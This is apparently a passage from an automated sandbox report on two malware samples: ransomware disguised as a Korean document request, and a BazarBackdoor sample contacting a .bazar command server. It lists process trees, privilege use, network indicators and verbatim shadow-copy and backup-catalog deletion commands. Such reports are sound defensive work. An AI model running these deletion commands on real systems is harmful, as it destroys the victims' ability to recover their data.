File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\MemMDL2.1.85.ttf C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsdan.xml C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\fr-FR\PackageManagementDscUtilities.strings.psd1 C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe"

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4484 -ip 4484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 752

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 768

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3324 -ip 3324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 772

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 652

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/3504-3-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3504-2-0x0000000002440000-0x000000000244B000-memory.dmp

memory/3504-1-0x0000000000850000-0x0000000000950000-memory.dmp

memory/3504-4798-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-6413-0x0000000000850000-0x0000000000950000-memory.dmp

memory/3504-7181-0x0000000002440000-0x000000000244B000-memory.dmp

memory/3504-8604-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4484-9621-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-13624-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-16279-0x0000000000400000-0x000000000083C000-memory.dmp

memory/4484-16281-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-16333-0x0000000000400000-0x000000000083C000-memory.dmp

memory/4348-16334-0x0000000000400000-0x000000000083C000-memory.dmp

memory/4348-16339-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-16416-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3324-16418-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3324-16423-0x0000000000400000-0x000000000083C000-memory.dmp

memory/3504-16492-0x0000000000400000-0x000000000083C000-memory.dmp

memory/4388-16494-0x0000000000400000-0x000000000083C000-memory.dmp

memory/4388-16498-0x0000000000400000-0x000000000083C000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe"

Signatures

BazarBackdoor

backdoor bazarbackdoor
Description Indicator Process Target
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A

Bazarbackdoor family

bazarbackdoor

Tries to connect to .bazar domain

Description Indicator Process Target
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A
N/A younika-hayde.bazar N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 172.104.136.243 N/A N/A
Destination IP 212.24.98.54 N/A N/A
Destination IP 163.172.185.51 N/A N/A
Destination IP 63.231.92.27 N/A N/A
Destination IP 128.52.130.209 N/A N/A
Destination IP 107.172.42.186 N/A N/A
Destination IP 31.171.251.118 N/A N/A
Destination IP 51.254.25.115 N/A N/A
Destination IP 139.99.96.146 N/A N/A
Destination IP 198.251.90.143 N/A N/A
Destination IP 159.89.249.249 N/A N/A
Destination IP 193.183.98.66 N/A N/A
Destination IP 142.4.204.111 N/A N/A
Destination IP 96.47.228.108 N/A N/A
Destination IP 87.98.175.85 N/A N/A
Destination IP 158.69.239.167 N/A N/A
Destination IP 46.28.207.199 N/A N/A
Destination IP 87.98.175.85 N/A N/A
Destination IP 111.67.20.8 N/A N/A
Destination IP 139.59.23.241 N/A N/A
Destination IP 139.59.208.246 N/A N/A
Destination IP 185.117.154.144 N/A N/A
Destination IP 92.222.97.145 N/A N/A
Destination IP 35.196.105.24 N/A N/A
Destination IP 172.98.193.42 N/A N/A
Destination IP 217.12.210.54 N/A N/A
Destination IP 167.99.153.82 N/A N/A
Destination IP 91.217.137.37 N/A N/A
Destination IP 50.3.82.215 N/A N/A
Destination IP 188.165.200.156 N/A N/A
Destination IP 77.73.68.161 N/A N/A
Destination IP 66.70.211.246 N/A N/A
Destination IP 51.254.25.115 N/A N/A
Destination IP 193.183.98.66 N/A N/A
Destination IP 82.196.9.45 N/A N/A
Destination IP 138.197.25.214 N/A N/A
Destination IP 185.121.177.177 N/A N/A
Destination IP 104.238.186.189 N/A N/A
Destination IP 178.17.170.179 N/A N/A
Destination IP 45.63.124.65 N/A N/A
Destination IP 104.37.195.178 N/A N/A
Destination IP 192.99.85.244 N/A N/A
Destination IP 185.208.208.141 N/A N/A
Destination IP 5.45.97.127 N/A N/A
Destination IP 5.132.191.104 N/A N/A
Destination IP 45.32.160.206 N/A N/A
Destination IP 5.135.183.146 N/A N/A
Destination IP 142.4.205.47 N/A N/A
Destination IP 89.18.27.167 N/A N/A
Destination IP 162.248.241.94 N/A N/A
Destination IP 144.76.133.38 N/A N/A
Destination IP 51.255.211.146 N/A N/A
Destination IP 163.53.248.170 N/A N/A
Destination IP 45.71.112.70 N/A N/A
Destination IP 146.185.176.36 N/A N/A
Destination IP 89.35.39.64 N/A N/A
Destination IP 46.101.70.183 N/A N/A
Destination IP 94.177.171.127 N/A N/A
Destination IP 130.255.78.223 N/A N/A
Destination IP 147.135.185.78 N/A N/A
Destination IP 91.217.137.37 N/A N/A
Destination IP 185.164.136.225 N/A N/A
Destination IP 69.164.196.21 N/A N/A
Destination IP 169.239.202.202 N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
HTTP URL https://api.opennicproject.org/geoip/ N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe

"C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
RO 85.204.116.188:443 tcp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
RO 86.104.194.109:443 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
RU 194.87.145.86:443 tcp
RU 194.87.145.86:443 tcp
RU 194.87.145.86:443 tcp
BA 185.99.2.221:443 tcp
US 8.8.8.8:53 86.145.87.194.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
DE 5.1.81.68:443 tcp
BA 185.164.32.148:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 api.opennicproject.org udp
DE 116.203.98.109:443 api.opennicproject.org tcp
FR 51.254.25.115:53 younika-hayde.bazar udp
IT 193.183.98.66:53 younika-hayde.bazar udp
RU 91.217.137.37:53 younika-hayde.bazar udp
US 8.8.8.8:53 115.25.254.51.in-addr.arpa udp
US 8.8.8.8:53 66.98.183.193.in-addr.arpa udp
US 8.8.8.8:53 109.98.203.116.in-addr.arpa udp
US 8.8.8.8:53 37.137.217.91.in-addr.arpa udp
FR 87.98.175.85:53 younika-hayde.bazar udp
AT 185.121.177.177:53 younika-hayde.bazar udp
US 8.8.8.8:53 85.175.98.87.in-addr.arpa udp
US 8.8.8.8:53 177.177.121.185.in-addr.arpa udp
ZA 169.239.202.202:53 younika-hayde.bazar udp
US 198.251.90.143:53 younika-hayde.bazar udp
US 8.8.8.8:53 202.202.239.169.in-addr.arpa udp
US 8.8.8.8:53 143.90.251.198.in-addr.arpa udp
AT 5.132.191.104:53 younika-hayde.bazar udp
AU 111.67.20.8:53 younika-hayde.bazar udp
US 8.8.8.8:53 8.20.67.111.in-addr.arpa udp
US 8.8.8.8:53 104.191.132.5.in-addr.arpa udp
AU 163.53.248.170:53 younika-hayde.bazar udp
CA 142.4.204.111:53 younika-hayde.bazar udp
CA 142.4.205.47:53 younika-hayde.bazar udp
US 8.8.8.8:53 47.205.4.142.in-addr.arpa udp
US 8.8.8.8:53 111.204.4.142.in-addr.arpa udp
US 8.8.8.8:53 170.248.53.163.in-addr.arpa udp
CA 158.69.239.167:53 younika-hayde.bazar udp
CA 104.37.195.178:53 younika-hayde.bazar udp
US 8.8.8.8:53 178.195.37.104.in-addr.arpa udp
US 8.8.8.8:53 167.239.69.158.in-addr.arpa udp
CA 192.99.85.244:53 younika-hayde.bazar udp
CA 158.69.160.164:53 younika-hayde.bazar udp
CH 46.28.207.199:53 younika-hayde.bazar udp
US 8.8.8.8:53 244.85.99.192.in-addr.arpa udp
US 8.8.8.8:53 164.160.69.158.in-addr.arpa udp
CH 31.171.251.118:53 younika-hayde.bazar udp
CZ 81.2.241.148:53 younika-hayde.bazar udp
US 8.8.8.8:53 118.251.171.31.in-addr.arpa udp
US 8.8.8.8:53 148.241.2.81.in-addr.arpa udp
US 8.8.8.8:53 199.207.28.46.in-addr.arpa udp
FR 51.254.25.115:53 younika-hayde.bazar udp
DE 82.141.39.32:53 younika-hayde.bazar udp
DE 50.3.82.215:53 younika-hayde.bazar udp
DE 46.101.70.183:53 younika-hayde.bazar udp
DE 5.45.97.127:53 younika-hayde.bazar udp
DE 130.255.78.223:53 younika-hayde.bazar udp
US 8.8.8.8:53 32.39.141.82.in-addr.arpa udp
US 8.8.8.8:53 215.82.3.50.in-addr.arpa udp
US 8.8.8.8:53 127.97.45.5.in-addr.arpa udp
US 8.8.8.8:53 183.70.101.46.in-addr.arpa udp
US 8.8.8.8:53 223.78.255.130.in-addr.arpa udp
DE 144.76.133.38:53 younika-hayde.bazar udp
DE 139.59.208.246:53 younika-hayde.bazar udp
DE 172.104.136.243:53 younika-hayde.bazar udp
EC 45.71.112.70:53 younika-hayde.bazar udp
US 8.8.8.8:53 38.133.76.144.in-addr.arpa udp
US 8.8.8.8:53 246.208.59.139.in-addr.arpa udp
US 8.8.8.8:53 70.112.71.45.in-addr.arpa udp
US 8.8.8.8:53 243.136.104.172.in-addr.arpa udp
FR 163.172.185.51:53 younika-hayde.bazar udp
FR 87.98.175.85:53 younika-hayde.bazar udp
FR 5.135.183.146:53 younika-hayde.bazar udp
US 8.8.8.8:53 51.185.172.163.in-addr.arpa udp
US 8.8.8.8:53 146.183.135.5.in-addr.arpa udp
FR 51.255.48.78:53 younika-hayde.bazar udp
FR 188.165.200.156:53 younika-hayde.bazar udp
US 8.8.8.8:53 78.48.255.51.in-addr.arpa udp
US 8.8.8.8:53 156.200.165.188.in-addr.arpa udp
FR 147.135.185.78:53 younika-hayde.bazar udp
FR 92.222.97.145:53 younika-hayde.bazar udp
FR 51.255.211.146:53 younika-hayde.bazar udp
US 8.8.8.8:53 78.185.135.147.in-addr.arpa udp
US 8.8.8.8:53 145.97.222.92.in-addr.arpa udp
GB 159.89.249.249:53 younika-hayde.bazar udp
GB 104.238.186.189:53 younika-hayde.bazar udp
US 8.8.8.8:53 146.211.255.51.in-addr.arpa udp
US 8.8.8.8:53 249.249.89.159.in-addr.arpa udp
US 8.8.8.8:53 189.186.238.104.in-addr.arpa udp
IN 139.59.23.241:53 younika-hayde.bazar udp
IT 193.183.98.66:53 younika-hayde.bazar udp
US 8.8.8.8:53 241.23.59.139.in-addr.arpa udp
IT 94.177.171.127:53 younika-hayde.bazar udp
JP 45.63.124.65:53 younika-hayde.bazar udp
LT 212.24.98.54:53 younika-hayde.bazar udp
US 8.8.8.8:53 127.171.177.94.in-addr.arpa udp
US 8.8.8.8:53 65.124.63.45.in-addr.arpa udp
US 8.8.8.8:53 54.98.24.212.in-addr.arpa udp
MD 178.17.170.179:53 younika-hayde.bazar udp
NL 185.208.208.141:53 younika-hayde.bazar udp
NL 82.196.9.45:53 younika-hayde.bazar udp
